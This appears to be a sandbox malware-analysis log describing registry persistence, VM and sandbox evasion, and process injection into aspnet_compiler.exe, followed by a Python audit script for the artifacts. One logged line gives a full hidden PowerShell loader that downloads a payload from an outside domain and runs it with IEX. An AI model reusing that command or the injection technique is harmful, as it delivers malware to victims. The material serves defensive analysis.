Source: Yara match File source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup (2 identical records)
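The persistence records above come down to two registry artifacts: a Blob value under HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 (a new machine-wide trusted root, keyed by its SHA-1 thumbprint) and a rewrite of the Startup entry under HKCU\...\Explorer\User Shell Folders, which controls where Explorer looks for the per-user Startup folder; pointing it at a directory the attacker controls makes whatever is there run at logon. The Python below is an added example, not from the report: it parses `reg export` text (a constructed export here, with a made-up redirect path, placeholder Blob bytes and a made-up baseline thumbprint) and flags a non-default Startup folder and any ROOT certificate key that is not on a given allowlist.

```python
DEFAULT_STARTUP = r"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
USF_KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
ROOT_CERTS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates"
SAMPLE_THUMBPRINT = "3F728A35DE52B2C8994A4FB101A03B95E87B06C8"   # key name recorded above
BASELINE_THUMBPRINT = "A1" * 20                                   # constructed known-good entry


def reg_expand_sz(value):
    """Encode a REG_EXPAND_SZ the way 'reg export' writes it: hex(2) of UTF-16LE plus NUL."""
    return "hex(2):" + ",".join(f"{b:02x}" for b in (value + "\0").encode("utf-16-le"))


# Constructed export: a redirected Startup folder and the sample's ROOT cert key next
# to one baseline root. The Blob bytes are placeholders, not real certificate blobs.
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    f"[{USF_KEY}]",
    '"Startup"=' + reg_expand_sz(r"C:\Users\Public\Libraries\Startup"),
    "",
    f"[{ROOT_CERTS_KEY}\\{SAMPLE_THUMBPRINT}]",
    '"Blob"=hex:00,00,00,00,\\',
    '  00,00,00,00',
    "",
    f"[{ROOT_CERTS_KEY}\\{BASELINE_THUMBPRINT}]",
    '"Blob"=hex:00,00,00,00',
])


def _logical_lines(text):
    """Join the backslash-continued lines that reg export uses for long hex values."""
    buf = ""
    for raw in text.splitlines():
        s = raw.strip()
        if s.endswith("\\"):
            buf += s[:-1]
            continue
        yield buf + s
        buf = ""


def parse_reg(text):
    """Parse a registry export into {key path: {value name: value}}; hex(2) is decoded to str."""
    keys, current = {}, None
    for line in _logical_lines(text):
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, val = line.partition("=")
            name = name.strip('"')
            if val.startswith("hex(2):"):
                val = bytes.fromhex(val[7:].replace(",", "")).decode("utf-16-le").rstrip("\0")
            elif len(val) >= 2 and val[0] == val[-1] == '"':
                val = val[1:-1]
            keys[current][name] = val
    return keys


def audit(keys, trusted_roots):
    """Flag a non-default Startup shell folder and any ROOT cert key outside the baseline."""
    findings = []
    startup = keys.get(USF_KEY, {}).get("Startup")
    if startup is not None and startup.lower() != DEFAULT_STARTUP.lower():
        findings.append(("startup_folder_redirected", startup))
    prefix = ROOT_CERTS_KEY.lower() + "\\"
    for key, values in keys.items():
        if key.lower().startswith(prefix) and "Blob" in values:
            thumbprint = key[len(prefix):].upper()
            if thumbprint not in trusted_roots:
                findings.append(("untrusted_root_cert", thumbprint))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_EXPORT), {BASELINE_THUMBPRINT}):
        print(*finding)
```

On a live host the same audit runs over the output of `reg export` for the two keys; reg export normally writes a UTF-16 file, so decode it before passing the text in, and build the allowlist from a clean reference image rather than from the host under investigation.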

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical records)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical records)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\taskkill.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
                      Source: powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Memory allocated: CC0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Memory allocated: 2A70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Memory allocated: 10C0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4461
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5335
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Window / User API: threadDelayed 9731
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852; Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576; Thread sleep count: 2402 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860; Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044; Thread sleep count: 138 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736; Thread sleep count: 255 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736; Thread sleep time: -255000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736; Thread sleep count: 9731 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736; Thread sleep time: -9731000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; File Volume queried: C:\ FullSizeInformation
                      Source: aspnet_compiler.exe, 00000015.00000002.3895569228.0000000000D86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                      Source: aspnet_compiler.exe, 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 00000004.00000002.2022616873.000002E7E2ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: aspnet_compiler.exe, 00000015.00000002.3895569228.0000000000D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match | File source: amsi64_2216.amsi.csv, type: OTHER
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 412000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 414000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 986008
